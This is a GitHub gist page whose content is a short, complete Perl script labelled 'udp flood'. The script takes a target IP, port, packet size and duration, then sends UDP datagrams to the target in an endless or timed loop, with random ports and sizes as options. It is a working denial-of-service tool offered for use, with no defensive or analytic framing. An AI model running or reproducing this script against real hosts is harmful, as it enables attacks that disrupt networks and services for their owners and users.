Skip to content

Instantly share code, notes, and snippets.

@todmephis
Created April 1, 2019 05:43
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save todmephis/cd40a4c45c57d8230be2c90c5ad5c4a9 to your computer and use it in GitHub Desktop.
Save todmephis/cd40a4c45c57d8230be2c90c5ad5c4a9 to your computer and use it in GitHub Desktop.
#!/usr/bin/perl
##############
# udp flood.
##############
use Socket;
use strict;
if ($#ARGV != 3) {
print "${0} <ip> <port> <size> <time>\n\n";
print " Port=0: use random ports\n";
print " Size=0: use random size between 64 and 1024\n";
print " Time=0: continuous flood\n";
exit(1);
}
my ($ip,$port,$size,$time) = @ARGV;
my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);
socket(flood, PF_INET, SOCK_DGRAM, 17);
print "Flooding [$ip] " . ($port ? $port : "random") . " port with " .
($size ? "$size-byte" : "random size") . " datagrams" .
($time ? " for $time seconds" : "") . "\n";
print "Break with Ctrl-C\n" unless $time;
for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1024-64)+64) ;
$pport = $port ? $port : int(rand(65500))+1;
send(flood, pack("a$psize","Padre Nuestro Que Estas En El Cielo"), 0, pack_sockaddr_in($pport, $iaddr));}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment